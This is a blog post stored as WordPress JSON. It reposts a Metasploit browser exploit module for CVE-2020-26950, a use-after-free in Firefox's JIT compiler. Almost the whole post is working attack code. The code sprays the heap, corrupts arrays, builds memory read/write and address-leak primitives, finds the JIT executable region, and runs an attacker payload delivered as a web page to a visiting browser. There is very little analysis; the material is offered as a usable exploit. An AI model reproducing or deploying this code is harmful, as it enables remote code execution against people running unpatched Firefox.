{"id":21145,"date":"2022-03-01T18:58:27","date_gmt":"2022-03-01T15:58:27","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166175\/firefox_jit_use_after_free.rb.txt"},"modified":"2022-03-02T12:25:54","modified_gmt":"2022-03-02T08:55:54","slug":"firefox-mcallgetproperty-write-side-effects-use-after-free","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/firefox-mcallgetproperty-write-side-effects-use-after-free\/","title":{"rendered":"Firefox MCallGetProperty Write Side Effects Use-After-Free"},"content":{"rendered":"

##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n

class MetasploitModule < Msf::Exploit::Remote
\nRank = ManualRanking<\/p>\n

include Msf::Exploit::Remote::HttpServer::BrowserExploit<\/p>\n

def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Firefox MCallGetProperty Write Side Effects Use After Free Exploit’,
\n‘Description’ => %q{
\nThis modules exploits CVE-2020-26950, a use after free exploit in Firefox.
\nThe MCallGetProperty opcode can be emitted with unmet assumptions resulting
\nin an exploitable use-after-free condition.<\/p>\n

This exploit uses a somewhat novel technique of spraying ArgumentsData
\nstructures in order to construct primitives. The shellcode is forced into
\nexecutable memory via the JIT compiler, and executed by writing to the JIT
\nregion pointer.<\/p>\n

This exploit does not contain a sandbox escape, so firefox must be run
\nwith the MOZ_DISABLE_CONTENT_SANDBOX environment variable set, in order
\nfor the shellcode to run successfully.<\/p>\n

This vulnerability affects Firefox < 82.0.3, Firefox ESR < 78.4.1, and
\nThunderbird < 78.4.2, however only Firefox <= 79 is supported as a target.
\nAdditional work may be needed to support other versions such as Firefox 82.0.1.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘360 ESG Vulnerability Research Institute’, # discovery
\n‘maxpl0it’, # writeup and exploit
\n‘timwr’, # metasploit module
\n],
\n‘References’ => [
\n[‘CVE’, ‘2020-26950’],
\n[‘URL’, ‘https:\/\/www.mozilla.org\/en-US\/security\/advisories\/mfsa2020-49\/#CVE-2020-26950’],
\n[‘URL’, ‘https:\/\/bugzilla.mozilla.org\/show_bug.cgi?id=1675905’],
\n[‘URL’, ‘https:\/\/www.sentinelone.com\/labs\/firefox-jit-use-after-frees-exploiting-cve-2020-26950\/’],
\n],
\n‘Arch’ => [ ARCH_X64 ],
\n‘Platform’ => [‘linux’, ‘windows’],
\n‘DefaultTarget’ => 0,
\n‘Targets’ => [
\n[ ‘Automatic’, {}],
\n],
\n‘Notes’ => {
\n‘Reliability’ => [ REPEATABLE_SESSION ],
\n‘SideEffects’ => [ IOC_IN_LOGS ],
\n‘Stability’ => [CRASH_SAFE]\n},
\n‘DisclosureDate’ => ‘2020-11-18’
\n)
\n)
\nend<\/p>\n

def create_js_shellcode
\nshellcode = “AAAA\\x00\\x00\\x00\\x00” + “\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90” + payload.encoded
\nif (shellcode.length % 8 > 0)
\nshellcode += “\\x00″ * (8 – shellcode.length % 8)
\nend
\nshellcode_js = ”
\nfor chunk in 0..(shellcode.length \/ 8) – 1
\nlabel = (0x41 + chunk \/ 26).chr + (0x41 + chunk % 26).chr
\nshellcode_chunk = shellcode[chunk * 8..(chunk + 1) * 8]\nshellcode_js += label + ‘ = ‘ + shellcode_chunk.unpack(‘E’).first.to_s + “\\n”
\nend
\nshellcode_js
\nend<\/p>\n

def on_request_uri(cli, request)
\nprint_status(“Sending #{request.uri} to #{request[‘User-Agent’]}”)
\nshellcode_js = create_js_shellcode
\njscript = <<~JS
\n\/\/ Triggers the vulnerability
\nfunction jitme(cons, interesting, i) {
\ninteresting.x1 = 10; \/\/ Make sure the MSlots is saved<\/p>\n

new cons(); \/\/ Trigger the vulnerability – Reallocates the object slots<\/p>\n

\/\/ Allocate a large array on top of this previous slots location.
\nlet target = [0,1,2,3,4,5,6,7,8,9,10,11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480, 481, 482, 483, 484, 485, 486, 487, 488, 489]; \/\/ Goes on to 489 to be close to the number of properties \u2018cons\u2019 has<\/p>\n

\/\/ Avoid Elements Copy-On-Write by pushing a value
\ntarget.push(i);<\/p>\n

\/\/ Write the Initialized Length, Capacity, and Length to be larger than it is
\n\/\/ This will work when interesting == cons
\ninteresting.x1 = 3.476677904727e-310;
\ninteresting.x0 = 3.4766779039175e-310;<\/p>\n

\/\/ Return the corrupted array
\nreturn target;
\n}<\/p>\n

\/\/ Initialises vulnerable objects
\nfunction init() {
\n\/\/ arr will contain our sprayed objects
\nvar arr = [];<\/p>\n

\/\/ We’ll create one object…
\nvar cons = function() {};
\nfor(j=0; j<512; j++) cons[‘x’+j] = j; \/\/ Add 512 properties (Large jemalloc allocation)
\narr.push(cons);<\/p>\n

\/\/ …then duplicate it a whole bunch of times
\n\/\/ The number of times has two uses:
\n\/\/ – Heap spray – Stops any already freed objects getting in our way
\n\/\/ – Allows us to get the jitme function compiled
\nfor (var i = 0; i < 20000; i++) arr.push(Object.assign(function(){}, cons));<\/p>\n

\/\/ Return the array
\nreturn arr;
\n}<\/p>\n

\/\/ Global that holds the total number of objects in our original spray array
\nTOTAL = 0;<\/p>\n

\/\/ Global that holds the target argument so it can be used later
\narg = 0;<\/p>\n

evil = 0;<\/p>\n

\/\/ setup_prim – Performs recursion to get the vulnerable arguments object
\n\/\/ arguments[0] – Original spray array
\n\/\/ arguments[1] – Recursive depth counter
\n\/\/ arguments[2]+ – Numbers to pad to the right reallocation size
\nfunction setup_prim() {
\n\/\/ Base case of our recursion
\n\/\/ If we have reached the end of the original spray array…
\nif(arguments[1] == TOTAL) {<\/p>\n

\/\/ Delete an argument to generate the RareArgumentsData pointer
\ndelete arguments[3];<\/p>\n

\/\/ Read out of bounds to the next object (sprayed objects)
\n\/\/ Check whether the RareArgumentsData pointer is null
\nif(evil[511] != 0) return arguments;<\/p>\n

\/\/ If it was null, then we return and try the next one
\nreturn 0;
\n}<\/p>\n

\/\/ Get the cons value
\nlet cons = arguments[0][arguments[1]];<\/p>\n

\/\/ Move the pointer (could just do cons.p481 = 481, but this is more fun)
\nnew cons();<\/p>\n

\/\/ Recursive call
\nres = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480 );<\/p>\n

\/\/ If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
\nif(res != 0) return res;<\/p>\n

\/\/ Otherwise, repeat the base case (delete an argument)
\ndelete arguments[3];<\/p>\n

\/\/ Check if the next object has a null RareArgumentsData pointer
\nif(evil[511] != 0) return arguments; \/\/ Return arguments if not<\/p>\n

\/\/ Otherwise just return 0 and try the next one
\nreturn 0;
\n}<\/p>\n

\/\/ weak_read32 – Bit-by-bit read
\nfunction weak_read32(arg, addr) {
\n\/\/ Set the RareArgumentsData pointer to the address
\nevil[511] = addr;<\/p>\n

\/\/ Used to hold the leaked data
\nlet val = 0;<\/p>\n

\/\/ Read it bit-by-bit for 32 bits
\n\/\/ Endianness is taken into account
\nfor(let i = 32; i >= 0; i–) {
\nval = val << 1; \/\/ Shift
\nif(arg[i] == undefined) {
\nval = val | 1;
\n}
\n}<\/p>\n

\/\/ Return the integer
\nreturn val;
\n}<\/p>\n

\/\/ weak_read64 – Bit-by-bit read using BigUint64Array
\nfunction weak_read64(arg, addr) {
\n\/\/ Set the RareArgumentsData pointer to the address
\nevil[511] = addr;<\/p>\n

\/\/ Used to hold the leaked data
\nval = new BigUint64Array(1);
\nval[0] = 0n;<\/p>\n

\/\/ Read it bit-by-bit for 64 bits
\nfor(let i = 64; i >= 0; i–) {
\nval[0] = val[0] << 1n;
\nif(arg[i] == undefined) {
\nval[0] = val[0] | 1n;
\n}
\n}<\/p>\n

\/\/ Return the BigInt
\nreturn val[0];
\n}<\/p>\n

\/\/ write_nan – Uses the bit-setting capability of the bitmap to create the NaN-Box
\nfunction write_nan(arg, addr) {
\nevil[511] = addr;
\nfor(let i = 64 – 15; i < 64; i++) delete arg[i]; \/\/ Delete bits 49-64 to create 0xfffe pointer box
\n}<\/p>\n

\/\/ write – Write a value to an address
\nfunction write(address, value) {
\n\/\/ Set the fake ArrayBuffer backing store address
\naddress = dbl_to_bigint(address)
\ntarget_uint32arr[14] = parseInt(address) & 0xffffffff
\ntarget_uint32arr[15] = parseInt(address >> 32n);<\/p>\n

\/\/ Use the fake ArrayBuffer backing store to write a value to a location
\nvalue = dbl_to_bigint(value);
\nfake_arrbuf[1] = parseInt(value >> 32n);
\nfake_arrbuf[0] = parseInt(value & 0xffffffffn);
\n}<\/p>\n

\/\/ addrof – Gets the address of a given object
\nfunction addrof(arg, o) {
\n\/\/ Set the 5th property of the arguments object
\narg[5] = o;<\/p>\n

\/\/ Get the address of the 5th property
\ntarget = ad_location + (7n * 8n) \/\/ [len][deleted][0][1][2][3][4][5] (index 7)<\/p>\n

\/\/ Set the fake ArrayBuffer backing store to point to this location
\ntarget_uint32arr[14] = parseInt(target) & 0xffffffff;
\ntarget_uint32arr[15] = parseInt(target >> 32n);<\/p>\n

\/\/ Read the address of the object o
\nreturn (BigInt(fake_arrbuf[1] & 0xffff) << 32n) + BigInt(fake_arrbuf[0]);
\n}<\/p>\n

\/\/ shellcode – Constant values which hold our shellcode to pop xcalc.
\nfunction shellcode(){
\n#{shellcode_js}
\n}<\/p>\n

\/\/ helper functions
\nvar conv_buf = new ArrayBuffer(8);
\nvar f64_buf = new Float64Array(conv_buf);
\nvar u64_buf = new Uint32Array(conv_buf);<\/p>\n

function dbl_to_bigint(val) {
\nf64_buf[0] = val;
\nreturn BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
\n}<\/p>\n

function bigint_to_dbl(val) {
\nu64_buf[0] = Number(val & 0xffffffffn);
\nu64_buf[1] = Number(val >> 32n);
\nreturn f64_buf[0];
\n}<\/p>\n

function main() {
\nlet i = 0;
\n\/\/ ensure the shellcode is in jit rwx memory
\nfor(i = 0;i < 0x5000; i++) shellcode();<\/p>\n

\/\/ The jitme function returns arrays. We’ll save them, just in case.
\nlet arr_saved = [];<\/p>\n

\/\/ Get the sprayed objects
\nlet arr = init();<\/p>\n

\/\/ This is our target object. Choosing one of the end ones so that there is enough time for jitme to be compiled
\nlet interesting = arr[arr.length – 10];<\/p>\n

\/\/ Iterate over the vulnerable object array
\nfor (i = 0; i < arr.length; i++) {
\n\/\/ Run the jitme function across the array
\ncorr_arr = jitme(arr[i], interesting, i);<\/p>\n

\/\/ Save the generated array. Never trust the garbage collector.
\narr_saved[i] = corr_arr;<\/p>\n

\/\/ Find the corrupted array
\nif(corr_arr.length != 491) {
\n\/\/ Save it for future evil
\nevil = corr_arr
\nbreak;
\n}
\n}<\/p>\n

if(evil == 0) {
\nprint(“Failure: Failed to get the corrupted array”);
\nreturn;
\n}
\nprint(“got the corrupted array ” + evil.length);<\/p>\n

TOTAL=arr.length;
\narg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339, 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357, 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375, 376, 377, 378, 379, 380, 381, 382, 383, 384, 385, 386, 387, 388, 389, 390, 391, 392, 393, 394, 395, 396, 397, 398, 399, 400, 401, 402, 403, 404, 405, 406, 407, 408, 409, 410, 411, 412, 413, 414, 415, 416, 417, 418, 419, 420, 421, 422, 423, 424, 425, 426, 427, 428, 429, 430, 431, 432, 433, 434, 435, 436, 437, 438, 439, 440, 441, 442, 443, 444, 445, 446, 447, 448, 449, 450, 451, 452, 453, 454, 455, 456, 457, 458, 459, 460, 461, 462, 463, 464, 465, 466, 467, 468, 469, 470, 471, 472, 473, 474, 475, 476, 477, 478, 479, 480);<\/p>\n

old_rareargdat_ptr = evil[511];
\nprint(“Leaked nursery location: ” + dbl_to_bigint(old_rareargdat_ptr).toString(16));<\/p>\n

iterator = dbl_to_bigint(old_rareargdat_ptr); \/\/ Start from this value
\ncounter = 0; \/\/ Used to prevent a while(true) situation
\nwhile(counter < 0x200) {
\n\/\/ Read the current address
\noutput = weak_read32(arg, bigint_to_dbl(iterator));<\/p>\n

\/\/ Check if it’s the expected size value for our ArgumentsObject object
\nif(output == 0x1e10 || output == 0x1e20) {
\n\/\/ If it is, then read the ArgumentsData pointer
\nad_location = weak_read64(arg, bigint_to_dbl(iterator + 8n));<\/p>\n

\/\/ Get the pointer in ArgumentsData to RareArgumentsData
\nptr_in_argdat = weak_read64(arg, bigint_to_dbl(ad_location + 8n));<\/p>\n

\/\/ ad_location + 8 points to the RareArgumentsData pointer, so this should match
\n\/\/ We do this because after spraying arguments, there may be a few ArgumentObjects to go past
\nif((ad_location + 8n) == ptr_in_argdat) break;
\n}
\n\/\/ Iterate backwards
\niterator = iterator – 8n;<\/p>\n

\/\/ Increment counter
\ncounter += 1;
\n}<\/p>\n

if(counter == 0x200) {
\nprint(“Failure: Failed to get AD location”);
\nreturn;
\n}<\/p>\n

print(“AD location: ” + ad_location.toString(16));<\/p>\n

\/\/ The target Uint32Array – A large size value to:
\n\/\/ – Help find the object (Not many 0x00101337 values nearby!)
\n\/\/ – Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
\ntarget_uint32arr = new Uint32Array(0x101337);<\/p>\n

\/\/ Find the Uint32Array starting from the original leaked Nursery pointer
\niterator = dbl_to_bigint(old_rareargdat_ptr);
\ncounter = 0; \/\/ Use a counter
\nwhile(counter < 0x5000) {<\/p>\n

\/\/ Read a memory address
\noutput = weak_read32(arg, bigint_to_dbl(iterator));<\/p>\n

\/\/ If we have found the right size value, we have found the Uint32Array!
\nif(output == 0x101337) break;<\/p>\n

\/\/ Check the next memory location
\niterator = iterator + 8n;<\/p>\n

\/\/ Increment the counter
\ncounter += 1;
\n}<\/p>\n

if(counter == 0x5000) {
\nprint(“Failure: Failed to find the Uint32Array”);
\nreturn;
\n}<\/p>\n

\/\/ Subtract from the size value address to get to the start of the Uint32Array
\narr_buf_addr = iterator – 40n;<\/p>\n

\/\/ Get the Array Buffer backing store
\narr_buf_loc = weak_read64(arg, bigint_to_dbl(iterator + 16n));
\nprint(“AB Location: ” + arr_buf_loc.toString(16));<\/p>\n

\/\/ Create a fake ArrayBuffer through cloning
\niterator = arr_buf_addr;
\nfor(i=0;i<64;i++) {
\noutput = weak_read32(arg, bigint_to_dbl(iterator));
\ntarget_uint32arr[i] = output;
\niterator = iterator + 4n;
\n}<\/p>\n

\/\/ Cell Header – Set it to Nursery to pass isNursery()
\ntarget_uint32arr[0x3fffa] = 1;<\/p>\n

\/\/ Write an unboxed pointer to arguments[0]\nevil[512] = bigint_to_dbl(arr_buf_loc);<\/p>\n

\/\/ Make it NaN-Boxed
\nwrite_nan(arg, bigint_to_dbl(ad_location + 16n)); \/\/ Points to evil[512]\/arguments[0]\n

\/\/ From here we have a fake UintArray in arg[0]\n\/\/ Pointer can be changed using target_uint32arr[14] and target_uint32arr[15]\nfake_arrbuf = arg[0];<\/p>\n

\/\/ Get the address of the shellcode function object
\nshellcode_addr = addrof(arg, shellcode);
\nprint(“Function is at: ” + shellcode_addr.toString(16));<\/p>\n

\/\/ Get the jitInfo pointer in the JSFunction object
\njitinfo = weak_read64(arg, bigint_to_dbl(shellcode_addr + 0x30n)); \/\/ JSFunction.u.native.extra.jitInfo_
\nprint(” jitinfo: ” + jitinfo.toString(16));<\/p>\n

\/\/ We can then fetch the RX region from here
\nrx_region = weak_read64(arg, bigint_to_dbl(jitinfo));
\nprint(” RX Region: ” + rx_region.toString(16));<\/p>\n

iterator = rx_region; \/\/ Start from the RX region
\nfound = false
\n\/\/ Iterate to find the 0x41414141 value in-memory. 8 bytes after this is the start of the shellcode.
\nfor(i = 0; i < 0x800; i++) {
\ndata = weak_read64(arg, bigint_to_dbl(iterator));
\nif(data == 0x41414141n) {
\niterator = iterator + 8n;
\nfound = true;
\nbreak;
\n}
\niterator = iterator + 8n;
\n}
\nif(!found) {
\nprint(“Failure: Failed to find the JIT start”);
\nreturn;
\n}<\/p>\n

\/\/ We now have a pointer to the start of the shellcode
\nshellcode_location = iterator;
\nprint(“Shellcode start: ” + shellcode_location.toString(16));<\/p>\n

\/\/ And can now overwrite the previous jitInfo pointer with our shellcode pointer
\nwrite(bigint_to_dbl(jitinfo), bigint_to_dbl(shellcode_location));<\/p>\n

print(“Triggering…”);
\nshellcode(); \/\/ Triggering our shellcode is as simple as calling the function again.
\n}
\nmain();
\nJS<\/p>\n

jscript = add_debug_print_js(jscript)
\nhtml = %(
\n<html>
\n<script>
\n#{jscript}
\n<\/script>
\n<\/html>
\n)
\nsend_response(cli, html, {
\n‘Content-Type’ => ‘text\/html’,
\n‘Cache-Control’ => ‘no-cache, no-store, must-revalidate’,
\n‘Pragma’ => ‘no-cache’, ‘Expires’ => ‘0’
\n})
\nend<\/p>\n

end<\/p>\n","protected":false},"excerpt":{"rendered":"

## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpServer::BrowserExploit def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Firefox MCallGetProperty Write Side Effects Use After Free Exploit’, ‘Description’ => %q{ This modules exploits CVE-2020-26950, a use after free exploit in Firefox. The MCallGetProperty …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21145","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21145","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21145"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21145\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21145"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21145"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21145"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}